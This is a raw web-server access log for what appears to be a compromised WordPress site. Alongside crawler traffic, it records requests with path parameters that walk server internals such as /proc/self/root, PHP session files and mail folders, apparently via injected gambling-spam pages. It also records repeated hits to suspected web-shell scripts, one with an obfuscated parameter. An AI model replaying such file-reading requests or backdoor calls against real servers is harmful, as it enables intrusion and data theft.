74.7.227.223 - - [01/Nov/2025:08:34:25 -0400] "GET /?path=//proc/self/root/proc/2966092/root/lib/debug/usr HTTP/1.1" 200 2917 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
52.70.209.13 - - [01/Nov/2025:08:34:26 -0400] "GET /freispiele-blos-einzahlung2025-beste-freespins-kostenfrei/?path=//opt/alt/ruby34/share/rubygems/rubygems/vendor/timeout/lib HTTP/1.1" 200 3425 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
36.85.79.74 - - [01/Nov/2025:08:34:27 -0400] "GET /chosen.php HTTP/1.1" 200 70998 "-" "-"
66.249.65.197 - - [01/Nov/2025:08:34:28 -0400] "GET /items/1424090627.htm HTTP/1.1" 200 18954 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
34.205.163.103 - - [01/Nov/2025:08:34:28 -0400] "GET /main/?path=//opt/alt/alt-nodejs6/root/var/gopher HTTP/1.1" 200 3055 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
36.85.79.74 - - [01/Nov/2025:08:34:29 -0400] "GET /chosen.php HTTP/1.1" 200 70998 "-" "-"
74.7.227.59 - - [01/Nov/2025:08:34:29 -0400] "GET /q-~109udZzseUIZS6tziYn9aFaKTrOO3QPfW2766/ HTTP/1.1" 200 4157 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
36.85.79.74 - - [01/Nov/2025:08:34:30 -0400] "GET /chosen.php HTTP/1.1" 200 70990 "-" "-"
3.208.156.9 - - [01/Nov/2025:08:34:32 -0400] "GET /beste-versorger-provision/?fileloc=//opt/cloudlinux/venv/lib64/python3.11/site-packages/clcommon/lib/network.py&path=//opt/cloudlinux/venv/lib64/python3.11/site-packages/clcommon/lib HTTP/1.1" 200 3300 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
36.85.79.74 - - [01/Nov/2025:08:34:32 -0400] "GET /chosen.php HTTP/1.1" 200 70990 "-" "-"
74.7.227.59 - - [01/Nov/2025:08:34:34 -0400] "GET /q-~119UjW0fK8UWSCHSdZNaQGVwHiXBVBoKw40654/ HTTP/1.1" 200 4132 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
36.85.79.74 - - [01/Nov/2025:08:34:34 -0400] "GET /chosen.php HTTP/1.1" 200 70990 "-" "-"
69.197.179.242 - - [01/Nov/2025:08:34:33 -0400] "GET /wp-content/x072d63/index.php?id=893896 HTTP/1.1" 200 0 "https://creativefinishings.com/wp-content/x072d63/index.php?id=893896" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3"
74.7.227.223 - - [01/Nov/2025:08:34:35 -0400] "GET /?path=//proc/self/root/proc/2970079/root/lib/tuned/aws HTTP/1.1" 200 0 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
199.188.200.18 - - [01/Nov/2025:08:29:36 -0400] "GET /tmp/tmp/index.php?ARRAY=7o2230223n313736323030333737362p2231223n22687474703n5p2s5p2s7n7334343676313373752r67697665656r63652r6p61745p2s3s6p633q7068705s636s64655s6n6326743q313736323030303137362q3362373436663233366461373935373939666135376435643365396361376334222p2232223n226537363732306562613137633034343263643834636339323834626464303763222p2233223n223433636166353462343930386234303338313861353963386339653165303235222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231332q33352q36302q37302q37322q38312q3132227q HTTP/1.1" 200 0 "-" "-"
36.85.79.74 - - [01/Nov/2025:08:34:36 -0400] "GET /chosen.php HTTP/1.1" 200 70990 "-" "-"
18.208.11.93 - - [01/Nov/2025:08:34:36 -0400] "GET /beste-versorger-provision/?fileloc=//proc/self/root/opt/cpanel/ea-openssl/include/openssl/ui.h&path=//proc/self/root/opt/cpanel/ea-openssl/include/openssl HTTP/1.1" 200 9871 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
74.7.227.59 - - [01/Nov/2025:08:34:37 -0400] "GET /q-~17vOz0tIsFMMCmWYFCZ9MglwTDFEd2ZN36430/ HTTP/1.1" 200 4148 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
66.249.65.197 - - [01/Nov/2025:08:34:38 -0400] "GET /items/1424097112.htm HTTP/1.1" 200 19218 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
36.85.79.74 - - [01/Nov/2025:08:34:38 -0400] "GET /chosen.php HTTP/1.1" 200 70998 "-" "-"
36.85.79.74 - - [01/Nov/2025:08:34:39 -0400] "GET /chosen.php HTTP/1.1" 200 71002 "-" "-"
52.1.157.90 - - [01/Nov/2025:08:34:40 -0400] "GET /freispiele-blos-einzahlung2025-beste-freespins-kostenfrei/?fileloc=//opt/cloudlinux/alt-php80/root/var/lib/php/session/BTuyupEiGsOGiT&path=//opt/cloudlinux/alt-php80/root/var/lib/php/session HTTP/1.1" 200 3888 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
74.7.227.59 - - [01/Nov/2025:08:34:40 -0400] "GET /q-~132onNYLui9HtGiDXb1KPgvVIncNHfMxK22955/ HTTP/1.1" 200 4136 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
36.85.79.74 - - [01/Nov/2025:08:34:41 -0400] "GET /chosen.php HTTP/1.1" 200 70990 "-" "-"
66.249.65.197 - - [01/Nov/2025:08:34:43 -0400] "GET /items/1424134132.htm HTTP/1.1" 200 18443 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.65.197 - - [01/Nov/2025:08:34:43 -0400] "GET /?q=2148186115800&channel=199e08&from=https://creativefinishings.com/select.cgi?q-~5HQstpjFxkeKWtxA82eKQoQMu6EtL3T29252/ HTTP/1.1" 200 18741 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
36.85.79.74 - - [01/Nov/2025:08:34:43 -0400] "GET /chosen.php HTTP/1.1" 200 70990 "-" "-"
44.205.192.249 - - [01/Nov/2025:08:34:44 -0400] "GET /beste-versorger-provision/?path=//opt/alt/alt-nodejs16/root/usr/share/locale/to/LC_MESSAGES HTTP/1.1" 200 3108 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
74.7.227.223 - - [01/Nov/2025:08:34:45 -0400] "GET /?path=//proc/self/root/proc/2966092/root/lib/tmpfiles.d HTTP/1.1" 200 4018 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
66.249.65.197 - - [01/Nov/2025:08:34:46 -0400] "GET /q-~2p8V3xPTYi9oiuly9olZMWMU69CTqpM169/ HTTP/1.1" 200 19701 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; GoogleOther)"
36.85.79.74 - - [01/Nov/2025:08:34:45 -0400] "GET /chosen.php HTTP/1.1" 200 70994 "-" "-"
74.7.227.59 - - [01/Nov/2025:08:34:45 -0400] "GET /q-~264kyUlvVmVLKoPsf2FLwanIKi3HUm4pa5019/ HTTP/1.1" 200 4134 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
50.17.193.48 - - [01/Nov/2025:08:34:48 -0400] "GET /eurogrand-kasino-probe-alle-erfahrungen-zum-euro-grand-vertrauenswurdig-login-pramie-2024-villa30-senderaum/?path=//home/creaqbdc/www/wp-content/plugins/google-site-kit/includes/Core/Contracts HTTP/1.1" 200 3442 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
36.85.79.74 - - [01/Nov/2025:08:34:47 -0400] "GET /chosen.php HTTP/1.1" 200 70998 "-" "-"
66.249.65.197 - - [01/Nov/2025:08:34:49 -0400] "GET /items/1424036570.htm HTTP/1.1" 200 18633 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
36.85.79.74 - - [01/Nov/2025:08:34:50 -0400] "GET /chosen.php HTTP/1.1" 200 70990 "-" "-"
74.7.227.59 - - [01/Nov/2025:08:34:50 -0400] "GET /q-~183Yw6jYnNNpOUZdtRHmkz9icAvOGhWgu29640/ HTTP/1.1" 200 4156 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
54.163.169.168 - - [01/Nov/2025:08:34:51 -0400] "GET /funciona-maquinas-tragamonedas-en-linea-sin-cargo-en-el-caso-de-revision-baywatch-que-nos-lo-olvidemos-joviales-dinero-positivo/?path=//opt/alt/alt-nodejs10/root/etc/opt HTTP/1.1" 403 1242 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
36.85.79.74 - - [01/Nov/2025:08:34:52 -0400] "GET /chosen.php HTTP/1.1" 200 70990 "-" "-"
36.85.79.74 - - [01/Nov/2025:08:34:54 -0400] "GET /chosen.php HTTP/1.1" 200 70997 "-" "-"
66.249.65.197 - - [01/Nov/2025:08:34:54 -0400] "GET /items/1424134270.htm HTTP/1.1" 200 18389 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
74.7.227.223 - - [01/Nov/2025:08:34:54 -0400] "GET /?path=//proc/self/root/proc/2970079/root/lib/modprobe.d HTTP/1.1" 200 2554 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
199.188.200.18 - - [01/Nov/2025:08:29:56 -0400] "GET /tmp/tmp/index.php?ARRAY=7o2230223n313736323030333739362p2231223n22687474703n5p2s5p2s7n7334343676313373752r67697665656r63652r6p61745p2s3s6p633q7068705s636s64655s6n6326743q313736323030303139362q3439383737346631633837623337303636643066613331393963363131386133222p2232223n226537363732306562613137633034343263643834636339323834626464303763222p2233223n223433636166353462343930386234303338313861353963386339653165303235222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231332q33352q36302q37302q37322q38312q3132227q HTTP/1.1" 200 0 "-" "-"
74.7.227.59 - - [01/Nov/2025:08:34:55 -0400] "GET /q-~90CMb9P5rTWKDz2oqvJJktJRhUikwJOv43727/ HTTP/1.1" 200 4132 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
36.85.79.74 - - [01/Nov/2025:08:34:55 -0400] "GET /chosen.php HTTP/1.1" 200 71006 "-" "-"
18.207.89.138 - - [01/Nov/2025:08:34:56 -0400] "GET /portfolio-residential/?path=//proc/self/root/opt/cpanel/ea-php72/root HTTP/1.1" 200 4116 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
216.73.216.11 - - [01/Nov/2025:08:34:56 -0400] "GET /online-french-roulette-classic-uk?fileloc=%2F%2Fproc%2Fself%2Fcwd%2Fwp-content%2Fplugins%2Fwp-file-manager%2Flib%2Fcodemirror%2Fmode%2Ftwig%2Findex.html&path=%2F%2Fproc%2Fself%2Fcwd%2Fwp-content%2Fplugins%2Fwp-file-manager%2Flib%2Fcodemirror%2Fmode%2Ftwig HTTP/1.1" 200 3190 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
66.249.65.197 - - [01/Nov/2025:08:34:56 -0400] "GET /?q=2148186115800&channel=199e08&from=https://creativefinishings.com/select.cgi?q-~265KFRu07g5C1MfMeQ5kM8J27VdLI3i5Y9632/ HTTP/1.1" 200 4145 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; GoogleOther)"
216.73.216.11 - - [01/Nov/2025:08:34:56 -0400] "GET /online-french-roulette-classic-uk?fileloc=%2F%2Fproc%2Fself%2Fcwd%2Fwp-content%2Fplugins%2Fwp-file-manager%2Flib%2Fcodemirror%2Fmode%2Feiffel%2Findex.html&path=%2F%2Fproc%2Fself%2Fcwd%2Fwp-content%2Fplugins%2Fwp-file-manager%2Flib%2Fcodemirror%2Fmode%2Feiffel HTTP/1.1" 200 5868 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.11 - - [01/Nov/2025:08:34:56 -0400] "GET /online-french-roulette-classic-uk?fileloc=%2F%2Fproc%2Fself%2Fcwd%2Fwp-content%2Fplugins%2Fwp-file-manager%2Flib%2Fcodemirror%2Fmode%2Fsmalltalk%2Findex.html&path=%2F%2Fproc%2Fself%2Fcwd%2Fwp-content%2Fplugins%2Fwp-file-manager%2Flib%2Fcodemirror%2Fmode%2Fsmalltalk HTTP/1.1" 200 3359 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.11 - - [01/Nov/2025:08:34:57 -0400] "GET /online-french-roulette-classic-uk?fileloc=%2F%2Fproc%2Fself%2Fcwd%2Fwp-content%2Fplugins%2Fwp-file-manager%2Flib%2Fjs%2Fi18n%2Fhelp%2Fzh_TW.html.js&path=%2F%2Fproc%2Fself%2Fcwd%2Fwp-content%2Fplugins%2Fwp-file-manager%2Flib%2Fjs%2Fi18n%2Fhelp HTTP/1.1" 200 3118 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
36.85.79.74 - - [01/Nov/2025:08:34:57 -0400] "GET /chosen.php HTTP/1.1" 200 70998 "-" "-"
216.73.216.11 - - [01/Nov/2025:08:34:58 -0400] "GET /online-french-roulette-classic-uk?fileloc=%2F%2Fproc%2Fself%2Fcwd%2Fwp-content%2Fplugins%2Fwp-file-manager%2Flib%2Fjs%2Fi18n%2Fhelp%2Fzh_CN.html.js&path=%2F%2Fproc%2Fself%2Fcwd%2Fwp-content%2Fplugins%2Fwp-file-manager%2Flib%2Fjs%2Fi18n%2Fhelp HTTP/1.1" 200 3079 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.227.59 - - [01/Nov/2025:08:34:59 -0400] "GET /q-~144tVHRTDnHDNNhQ4y0ukDYjsPBRcxYEZ26589/ HTTP/1.1" 200 4137 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
216.73.216.11 - - [01/Nov/2025:08:34:59 -0400] "GET /online-french-roulette-classic-uk?fileloc=%2F%2Fproc%2Fself%2Fcwd%2Fwp-content%2Fplugins%2Fwp-file-manager%2Flib%2Fcodemirror%2Fmode%2Fgherkin%2Fgherkin.js&path=%2F%2Fproc%2Fself%2Fcwd%2Fwp-content%2Fplugins%2Fwp-file-manager%2Flib%2Fcodemirror%2Fmode%2Fgherkin HTTP/1.1" 200 8608 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.11 - - [01/Nov/2025:08:34:59 -0400] "GET /online-french-roulette-classic-uk?fileloc=%2F%2Fproc%2Fself%2Fcwd%2Fwp-content%2Fplugins%2Fwp-file-manager%2Flib%2Fcodemirror%2Fmode%2Fcss%2Findex.html&path=%2F%2Fproc%2Fself%2Fcwd%2Fwp-content%2Fplugins%2Fwp-file-manager%2Flib%2Fcodemirror%2Fmode%2Fcss HTTP/1.1" 200 3336 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.11 - - [01/Nov/2025:08:34:59 -0400] "GET /online-french-roulette-classic-uk?fileloc=%2F%2Fproc%2Fself%2Fcwd%2Fwp-content%2Fplugins%2Fwp-file-manager%2Flib%2Fcodemirror%2Fmode%2Fjulia%2Findex.html&path=%2F%2Fproc%2Fself%2Fcwd%2Fwp-content%2Fplugins%2Fwp-file-manager%2Flib%2Fcodemirror%2Fmode%2Fjulia HTTP/1.1" 200 3870 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
66.249.65.197 - - [01/Nov/2025:08:35:01 -0400] "GET /q-~37olUcOrCSAZpA1pFwVKGbL2ZYcLHUDE37122/ HTTP/1.1" 200 19752 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
36.85.79.74 - - [01/Nov/2025:08:35:00 -0400] "GET /chosen.php HTTP/1.1" 200 70998 "-" "-"
35.172.125.172 - - [01/Nov/2025:08:35:00 -0400] "GET /portfolio-commercial/?path=//home/creaqbdc/mail/creativefinishings.com/info/.spam/tmp HTTP/1.1" 200 3072 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
216.73.216.11 - - [01/Nov/2025:08:35:00 -0400] "GET /online-french-roulette-classic-uk?fileloc=%2F%2Fproc%2Fself%2Fcwd%2Fwp-content%2Fplugins%2Fwp-file-manager%2Flib%2Fjs%2Fi18n%2Fhelp%2Fes.html.js&path=%2F%2Fproc%2Fself%2Fcwd%2Fwp-content%2Fplugins%2Fwp-file-manager%2Flib%2Fjs%2Fi18n%2Fhelp HTTP/1.1" 200 3032 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.11 - - [01/Nov/2025:08:35:00 -0400] "GET /online-french-roulette-classic-uk?fileloc=%2F%2Fproc%2Fself%2Fcwd%2Fwp-content%2Fplugins%2Fwp-file-manager%2Flib%2Fcodemirror%2Fmode%2Fmllike%2Fmllike.js&path=%2F%2Fproc%2Fself%2Fcwd%2Fwp-content%2Fplugins%2Fwp-file-manager%2Flib%2Fcodemirror%2Fmode%2Fmllike HTTP/1.1" 200 3989 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.11 - - [01/Nov/2025:08:35:01 -0400] "GET /online-french-roulette-classic-uk?fileloc=%2F%2Fproc%2Fself%2Fcwd%2Fwp-content%2Fplugins%2Fwp-file-manager%2Flib%2Fcodemirror%2Fmode%2Foctave%2Findex.html&path=%2F%2Fproc%2Fself%2Fcwd%2Fwp-content%2Fplugins%2Fwp-file-manager%2Flib%2Fcodemirror%2Fmode%2Foctave HTTP/1.1" 200 3473 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.11 - - [01/Nov/2025:08:35:01 -0400] "GET /online-french-roulette-classic-uk?fileloc=%2F%2Fproc%2Fself%2Fcwd%2Fwp-content%2Fplugins%2Fwp-file-manager%2Flib%2Fcodemirror%2Fmode%2Fwebidl%2Findex.html&path=%2F%2Fproc%2Fself%2Fcwd%2Fwp-content%2Fplugins%2Fwp-file-manager%2Flib%2Fcodemirror%2Fmode%2Fwebidl HTTP/1.1" 200 3337 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.227.223 - - [01/Nov/2025:08:35:01 -0400] "GET /?path=//proc/self/root/proc/2966092/root/lib/firmware/ti HTTP/1.1" 200 2958 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
36.85.79.74 - - [01/Nov/2025:08:35:02 -0400] "GET /chosen.php HTTP/1.1" 200 70998 "-" "-"
216.73.216.11 - - [01/Nov/2025:08:35:02 -0400] "GET /online-french-roulette-classic-uk?fileloc=%2F%2Fproc%2Fself%2Fcwd%2Fwp-content%2Fplugins%2Fwp-file-manager%2Flib%2Fcodemirror%2Fmode%2Fasterisk%2Findex.html&path=%2F%2Fproc%2Fself%2Fcwd%2Fwp-content%2Fplugins%2Fwp-file-manager%2Flib%2Fcodemirror%2Fmode%2Fasterisk HTTP/1.1" 200 4672 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
52.203.65.83 - - [01/Nov/2025:08:35:03 -0400] "GET /portfolio-residential/?path=//proc/self/root/proc/thread-self/root/etc/imunify360 HTTP/1.1" 403 1242 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
216.73.216.11 - - [01/Nov/2025:08:35:02 -0400] "GET /online-french-roulette-classic-uk?fileloc=%2F%2Fproc%2Fself%2Fcwd%2Fwp-content%2Fplugins%2Fwp-file-manager%2Flib%2Fcodemirror%2Fmode%2Fcmake%2Findex.html&path=%2F%2Fproc%2Fself%2Fcwd%2Fwp-content%2Fplugins%2Fwp-file-manager%2Flib%2Fcodemirror%2Fmode%2Fcmake HTTP/1.1" 200 4413 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.11 - - [01/Nov/2025:08:35:03 -0400] "GET /online-french-roulette-classic-uk?fileloc=%2F%2Fproc%2Fself%2Fcwd%2Fwp-content%2Fplugins%2Fwp-file-manager%2Flib%2Fjs%2Fi18n%2Fhelp%2Fpl.html.js&path=%2F%2Fproc%2Fself%2Fcwd%2Fwp-content%2Fplugins%2Fwp-file-manager%2Flib%2Fjs%2Fi18n%2Fhelp HTTP/1.1" 200 3158 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.11 - - [01/Nov/2025:08:35:03 -0400] "GET /online-french-roulette-classic-uk?fileloc=%2F%2Fproc%2Fself%2Fcwd%2Fwp-content%2Fplugins%2Fwp-file-manager%2Flib%2Fjs%2Fi18n%2Fhelp%2Fru.html.js&path=%2F%2Fproc%2Fself%2Fcwd%2Fwp-content%2Fplugins%2Fwp-file-manager%2Flib%2Fjs%2Fi18n%2Fhelp HTTP/1.1" 200 3315 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.227.59 - - [01/Nov/2025:08:35:03 -0400] "GET /q-~67yHLNY5LwsHzaVbZmfKcdkxbM4Nv8Ev10850/ HTTP/1.1" 200 4152 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
216.73.216.11 - - [01/Nov/2025:08:35:02 -0400] "GET /online-french-roulette-classic-uk?fileloc=%2F%2Fproc%2Fself%2Fcwd%2Fwp-content%2Fplugins%2Fwp-file-manager%2Flib%2Fjs%2Fi18n%2Fhelp%2Fsk.html.js&path=%2F%2Fproc%2Fself%2Fcwd%2Fwp-content%2Fplugins%2Fwp-file-manager%2Flib%2Fjs%2Fi18n%2Fhelp HTTP/1.1" 200 3159 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.11 - - [01/Nov/2025:08:35:04 -0400] "GET /online-french-roulette-classic-uk?fileloc=%2F%2Fproc%2Fself%2Fcwd%2Fwp-content%2Fplugins%2Fwp-file-manager%2Flib%2Fcodemirror%2Fmode%2Fhttp%2Findex.html&path=%2F%2Fproc%2Fself%2Fcwd%2Fwp-content%2Fplugins%2Fwp-file-manager%2Flib%2Fcodemirror%2Fmode%2Fhttp HTTP/1.1" 200 3237 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
66.249.65.197 - - [01/Nov/2025:08:35:06 -0400] "GET /items/1423597659.htm HTTP/1.1" 200 18808 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
216.73.216.11 - - [01/Nov/2025:08:35:04 -0400] "GET /online-french-roulette-classic-uk?fileloc=%2F%2Fproc%2Fself%2Fcwd%2Fwp-content%2Fplugins%2Fwp-file-manager%2Flib%2Fcodemirror%2Fmode%2Fmbox%2Fmbox.js&path=%2F%2Fproc%2Fself%2Fcwd%2Fwp-content%2Fplugins%2Fwp-file-manager%2Flib%2Fcodemirror%2Fmode%2Fmbox HTTP/1.1" 200 3861 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.11 - - [01/Nov/2025:08:35:06 -0400] "GET /online-french-roulette-classic-uk?fileloc=%2F%2Fproc%2Fself%2Fcwd%2Fwp-content%2Fplugins%2Fwp-file-manager%2Flib%2Fjs%2Fi18n%2Fhelp%2Fde.html.js&path=%2F%2Fproc%2Fself%2Fcwd%2Fwp-content%2Fplugins%2Fwp-file-manager%2Flib%2Fjs%2Fi18n%2Fhelp HTTP/1.1" 200 3727 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
36.85.79.74 - - [01/Nov/2025:08:35:04 -0400] "GET /chosen.php HTTP/1.1" 200 70997 "-" "-"
216.73.216.11 - - [01/Nov/2025:08:35:06 -0400] "GET /online-french-roulette-classic-uk?fileloc=%2F%2Fproc%2Fself%2Fcwd%2Fwp-content%2Fplugins%2Fwp-file-manager%2Flib%2Fcodemirror%2Fmode%2Fgo%2Findex.html&path=%2F%2Fproc%2Fself%2Fcwd%2Fwp-content%2Fplugins%2Fwp-file-manager%2Flib%2Fcodemirror%2Fmode%2Fgo HTTP/1.1" 200 3557 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.11 - - [01/Nov/2025:08:35:06 -0400] "GET /online-french-roulette-classic-uk?fileloc=%2F%2Fproc%2Fself%2Fcwd%2Fwp-content%2Fplugins%2Fwp-file-manager%2Flib%2Fcodemirror%2Fmode%2Ftextile%2Ftest.js&path=%2F%2Fproc%2Fself%2Fcwd%2Fwp-content%2Fplugins%2Fwp-file-manager%2Flib%2Fcodemirror%2Fmode%2Ftextile HTTP/1.1" 200 5070 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
